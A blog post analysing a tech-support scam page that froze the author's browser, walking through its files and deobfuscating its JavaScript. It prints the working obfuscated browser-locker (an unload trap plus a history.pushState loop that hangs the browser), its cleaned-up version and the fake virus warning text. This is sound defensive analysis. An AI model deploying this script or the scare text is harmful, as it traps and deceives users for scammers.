Benedikt Bitterli

Reverse Engineering a Malicious Scam Script

A few days ago I was browsing the web and landed on a website with a malicious ad. Although malicious ads are not uncommon, this one managed to slip past my adblocker and immediately redirected me to a website that looked like this:

Empty Cornell Box

Audio started blaring, and a robotic voice told me my computer was infected and I would lose all my data if I didn't call Microsoft technical support. A modal dialog prevented me from leaving, the URL bar started growing and eventually my browser froze completely. Definitely an impressive display!

Of course, my computer was not infected with malware. The "RDN/YahLover.worm" referenced by the website is fictional, and is part of a series of online scams trying to coax victims into believing their computer has been infected by a virus and can only be fixed by calling a toll free hotline. The "Microsoft certified" technician on the phone will then "fix" the affected computer for a fee and/or talk the user into installing actual malware. A writeup by malwarebytes has a nice compilation of variations of this scam found around the web.

Being somewhat familiar with computers, I didn't try to call the hotline to have a technician fix my computer. Even if I wanted to, I would have been met with slight difficulty: the scammer forgot to put down a phone number to call. However, I was still left feeling very uneasy - my browser froze complety, and it wasn't unthinkable the website could have used a Chrome exploit to drop actual malware on my system. To make myself feel more at ease (and because I was curious), I decided to dig into the inner workings of this scam website.

Identifying the website origin

The scammer in this case didn't bother to register a domain name, and redirects his victims directly to an IPv4 address. To my surprise, a geoIP lookup revealed the origin server to not be hosted in a country with loose internet laws, but was in fact US based:

Empty Cornell Box

The website was hosted by Digital Ocean, a popular cloud provider - even scammers seem to have embraced the power of The Cloud™! Luckily Digital Ocean provides an email address to report abuse, and I've contacted them about the offending website. At the time of writing they have not yet responded, but they likely will take appropriate action.

Analysing the website

With DigitalOcean notified, it was time to take a look at the website itself. I wanted to confirm whether my machine could have been compromised, and I was also curious to see how a scam website is built.

The first step in this process is to download a local copy of the website so we can inspect it in peace. Since browsers have the nasty habit of rendering and executing all websites they retrieve, we instead turn to wget to download a copy of the offending site.

Interestingly, this did not work: Using a straightforward wget call hangs forever. After some probing, I figured out that the problem was the user agent: A short piece of info an HTTP client sends to a webserver to tell them what software is contacting them. By default, wget identifies itself to the server as Wget/1.19.1. What if we instead pretend to be a Chrome browser? wget allows us to specify the user agent it sends to the server, so let's try this one:

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
And lo, the server responds with the data we're looking for. I'm not sure whether this is an attempt at frustrating analysis of the site, or whether this is standard crawler countermeasure, but it's interesting nonetheless.

Looking at the downloaded files reveals a surprisingly lightweight site structure:

├── files
│   ├── defender.png
│   ├── fake_close.png
│   └── Texts.mp3
└── index.html

defender.png is a Microsoft-like logo used to add some legitimacy to the website. fake_close.png is used in the background message box as a close icon that, as the name suggests, doesn't actually work:

Empty Cornell Box
Texts.mp3 is an audio file produced by a text-to-speech program, which warns you about the terrible consequences of leaving the website and not calling the scam support hotline. Originally I assumed the website was using an obscure text-to-speech feature in my browser to produce the audio, but it turns out it's simply an MP3 file placed in an HTML5 audio tag. It's worth reproducing the file here for its entertainment value:

Poking at the source code

With the files out of the way, let's take a look at the source of the site itself. The index.html file starts like this:

<!-- Works on Chrome and FF -->
<!DOCTYPE html>
<html>
  <head>
    <meta name="robots" content="noindex, nofollow">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Security Warning</title>
    <meta name="robots" content="NOINDEX,NOFOLLOW">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js">
    </script>

There are a few interesting things here. Most of the code is unobfuscated and nicely formatted. The authors even left a helpful comment to note that it has been tested to work on Chrome and Firefox. Additionally, the authors do not want this site to be indexed by search engines - so much so that the robots meta tag is added twice. Finally, the inclusion of jquery reveals the site author to be an experienced web developer; especially since none of the JS on the site actually uses jquery. Interestingly, the particular version of jquery used here is 18 months out of date.

Then follow approximately 130 lines of standard HTML and inline CSS to setup the blue background message and the fake message box. The bottom of the file is where things gets interesting. The first thing we find is a Google Analytics tracking script:

<script>
 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

 ga('create', 'UA-99222626-1', 'auto');
 ga('send', 'pageview');
</script>

I can only assume, but I imagine this is how the scammers measure the amount of traffic driven to their site, and possibly even the conversion rate of visitors to phone calls.

The most interesting piece of JS is found at the very bottom of the site. It has been deliberately obfuscated and appears to be responsible for how the site behaves. Let's take a look:

var text = '*************************************************\nInternet Security Alert! Code: 055BCCAC9FEC\n ************************************************* \n\nInternet Security Alert: Your Computer Might Be Infected By Harmful Viruses \nPlease Do Not Shut Down or Reset Your Computer.\n\nThe following data might be compromised if you continue:\n1. Passwords\n2. Browser History\n3. Credit Card Information\n4. Local Hard Disk Files\n\nThese viruses are well known for identity and credit card theft. Further action on this computer or any other device on your network might reveal private information and involve serious risks.\n\n Call Windows Technical Support:  (Toll Free)';
var _0x45bf=['\x70\x75\x73\x68\x53\x74\x61\x74\x65','\x6f\x6e\x62\x65\x66\x6f\x72\x65\x75\x6e\x6c\x6f\x61\x64','\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x52\x44\x4e\x2f\x59\x61\x68\x4c\x6f\x76\x65\x72\x2e\x77\x6f\x72\x6d\x21\x30\x35\x35\x42\x43\x43\x41\x43\x39\x46\x45\x43\x20\x49\x6e\x66\x65\x63\x74\x69\x6f\x6e\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x0a','\x72\x65\x74\x75\x72\x6e\x56\x61\x6c\x75\x65','\x6f\x6e\x6c\x6f\x61\x64','\x74\x6f\x53\x74\x72\x69\x6e\x67'];(function(_0x5954e7,_0x10ca6d){var _0x4d8f25=function(_0x3abcd2){while(--_0x3abcd2){_0x5954e7['\x70\x75\x73\x68'](_0x5954e7['\x73\x68\x69\x66\x74']());}};_0x4d8f25(++_0x10ca6d);}(_0x45bf,0x145));var _0xf45b=function(_0xc97b12,_0x180ff3){_0xc97b12=_0xc97b12-0x0;var _0x2933ba=_0x45bf[_0xc97b12];return _0x2933ba;};function ch(_0x454dc6){window[_0xf45b('0x0')]=function(_0x4a502f){var _0x2e1ee7=_0xf45b('0x1')+_0x454dc6;_0x4a502f[_0xf45b('0x2')]=_0x2e1ee7;return _0x2e1ee7;};window[_0xf45b('0x3')]=function(){if(confirm('\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x52\x44\x4e\x2f\x59\x61\x68\x4c\x6f\x76\x65\x72\x2e\x77\x6f\x72\x6d\x21\x30\x35\x35\x42\x43\x43\x41\x43\x39\x46\x45\x43\x20\x49\x6e\x66\x65\x63\x74\x69\x6f\x6e\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x0a'+_0x454dc6)){var _0x5a0f53='';for(var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++){_0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);}}else{var _0x5a0f53='';for(var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++){_0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);}}};}ch(text);

Deobfuscating the JS snippet

Let's break this into pieces. The first part of the script is a piece of unobfuscated text that controls the contents of the popup dialog. Presumably this allows easy editing of the message in the future (such as adding the phone number).

Following the message text is an array of strings. Let's add some whitespace formatting and see what we are dealing with:

var _0x45bf = [
  '\x70\x75\x73\x68\x53\x74\x61\x74\x65',
  '\x6f\x6e\x62\x65\x66\x6f\x72\x65\x75\x6e\x6c\x6f\x61\x64',
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x52\x44\x4e\x2f\x59\x61\x68\x4c\x6f\x76\x65\x72' +
  '\x2e\x77\x6f\x72\x6d\x21\x30\x35\x35\x42\x43\x43\x41\x43\x39\x46\x45\x43\x20\x49\x6e' +
  '\x66\x65\x63\x74\x69\x6f\x6e\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x0a',
  '\x72\x65\x74\x75\x72\x6e\x56\x61\x6c\x75\x65',
  '\x6f\x6e\x6c\x6f\x61\x64',
  '\x74\x6f\x53\x74\x72\x69\x6e\x67'
];

These are definitely strings, but they look like gibberish at first. What is happening here is that every character has been encoded using a unicode escape sequence. The JS interpreter will happily parse these and turn them back into characters, but for humans these are quite hard to decipher. However, with a bit of python we can quickly deobfuscate these strings:

var _0x45bf = [
    'pushState',
    'onbeforeunload',
      '*************************************************\n' +
               'RDN/YahLover.worm!055BCCAC9FEC Infection\n' +
    '*************************************************\n\n',
    'returnValue',
    'onload',
    'toString'
];

We can quickly see that these are names of JS functions, as well as the name of the fictional worm infection. It's worth mentioning here that the script uses very peculiar variable names such as _0x45bf to make analysis more inconvenient. These are deliberately picked to look like hex constants, but they're really just identifiers - the leading underscore makes sure they are parsed as such by the JS interpreter. In the following I will rename these identifiers to more readable variable names, with a rough guess based on how they're used.

After the array of strings follows an anonymous function that is immediately called. Let's take a look:

(function(_0x5954e7,_0x10ca6d){ 
    var _0x4d8f25 = function(_0x3abcd2) {
        while(--_0x3abcd2) {
            _0x5954e7['\x70\x75\x73\x68'](_0x5954e7['\x73\x68\x69\x66\x74']());
        }
    };
    _0x4d8f25(++_0x10ca6d);
}(_0x45bf,0x145));

As before, I have formatted the script to make it a bit more readable.

We can see that the pattern of obscure variable names continues. A new pattern we will see a lot of are expressions of the form _0x5954e7['\x70\x75\x73\x68']() (after deobfuscation: list['push']()). These are in fact method calls. JS is peculiar in that objects are a lot like dictionaries, and a call of the form foo['bar']() is fully equivalent to foo.bar(). Although the former version is valid, you would rarely encounter this in normal JS code, and it works as an added layer of obfuscation.

After renaming the variables, deobfuscating the strings and converting the method calls, we get this more readable version:

(function(list, N) { 
    var rotateList = function(NplusOne) {
        while(--NplusOne) {
            list.push(list.shift());
        }
    };
    rotateList(++N);
}(stringList, 325));

The sole purpose of this function is to shuffle the list of strings we've seen earlier. The inner loop repeatedly calls list.push(list.shift()). In JS, shift removes the front element of a list, and push adds it to the back. In other words, one loop iteration simply rotates all entries one to the left.

The function call applies this to the string list and rotates it 325 times. Since the string list has 6 elements, we will get back the original list after 6 rotations. We can see that 325 mod 6 = 1, meaning that all this piece of code does is rotate the strings one entry to the left. The string list then looks like this:

var shuffledStringList = [
    'onbeforeunload',
    wormName,
    'returnValue',
    'onload',
    'toString',
    'pushState'
];

I've shortened the string identifying the malware to wormName to make things less busy.

After shuffling, the script then defines this function:

var _0xf45b=function(_0xc97b12,_0x180ff3) {
    _0xc97b12=_0xc97b12-0x0;
    var _0x2933ba=_0x45bf[_0xc97b12];
    return _0x2933ba;
};

Amusingly, hex constants are used whenever possible, even when it's completely pointless: One example here is 0x0.

Let's look at the deobfuscated version:

function indexStringList(idx) {
    idx = idx - 0;
    var result = shuffledStringList[idx];
    return result;
};

This function is quite simple: It just returns an entry of the shuffledStringList array at the specified index. As an additional indirection, the index is passed in as a string, and converted to an integer using the expression idx = idx - 0;. The reason this works is due to a peculiarity of JS, which will automatically convert strings to decimals when they are used in an arithmetic operation.

What follows is the main entry function of the script. After reformatting, it looks like this:

function ch(_0x454dc6){
  window[_0xf45b('0x0')] = function(_0x4a502f){
    var _0x2e1ee7=_0xf45b('0x1')+_0x454dc6;
    _0x4a502f[_0xf45b('0x2')]=_0x2e1ee7;
    return _0x2e1ee7;
  };
  window[_0xf45b('0x3')] = function() {
    if(confirm(wormName+_0x454dc6)){
      var _0x5a0f53='';
      for (var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++) {
        _0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();
        history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);
      }
    } else {
      var _0x5a0f53='';
      for (var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++) {
        _0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();
        history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);
      }
    }
  };
}
ch(text);

The first thing we notice are a lot of calls of the form _0xf45b('0x0'). These are calls to the indexStringList function we looked at earlier. We already know that these simply return entries from the shuffled string list, so we can directly replace them with their final value; _0xf45b('0x0') becomes onbeforeunload and so forth.

Similar to before, this code also uses expressions of the form window[_0xf45b('0x0')], which are obfuscated calls to methods of the global window instance. With these transformations in mind, we can now rewrite the code into its final deobfuscated form:

function main(messageBody) {
    window.onbeforeunload = function(event) {
        var dialogText = wormName + messageBody;
        event.returnValue = dialogText;
        return dialogText;
    };
    window.onload = function() { 
        if (confirm(wormName + messageBody)) {
            var url = '';
            for (var i = 0; i < 100000000; i++) {
                url = url + i.toString();
                history.pushState(0, 0, url);
            }
        } else {
            var url = '';
            for (var i = 0; i < 100000000; i++) {
                url = url + i.toString();
                history.pushState(0, 0, url);
            }
        }
    };
}
main(text);

This allows us to decipher the purpose of this JS snippet. It does three things:

With all obfuscation removed, we arrive at a remarkably simple script. Its main purpose is to deliver a scary sounding message and make sure the user stays on the website long enough to read it (and, hopefully, call the number).

Reassuringly, this script was not capable of dropping actual malware on my machine. We can now also see the reason why my browser froze: Absurdly long URLs and spamming the history object are two things Chrome does not handle well.

Closing Remarks

Even though tech hotline scams are relatively low tech compared to proper malware attacks, a surprising amount of effort went into obfuscating the JS script on the site. The simplified script measures in at less than 30 lines, but took a couple of hours to reverse engineer. Together with the lightweight site structure and cleanly formatted code I'm tempted to believe this was written by someone surprisingly competent at web development. I can only guess why they forgot to add a phone number to actually make the scam work - either it was a crucial oversight, or what I saw was only an early test version of what will later become a proper scam site.

Something that is slightly disappointing is to see how little JS it takes to actually set this up, and how easy it is to make a browser completely unusable to the point where we can't leave a website and need to restart. Given the amount of ads delivered every day and how easy it is to sneak in 30 lines of JS somewhere, I'm surprised this does not happen more often.

Either way, this was a fun project to spend a few hours on. Next time you land on a scam site, why not poke around at its source and see how it works? You might learn something interesting.

Update 8/25/2017: The JS appears to have been obfuscated by an automated Javascript Obfuscator.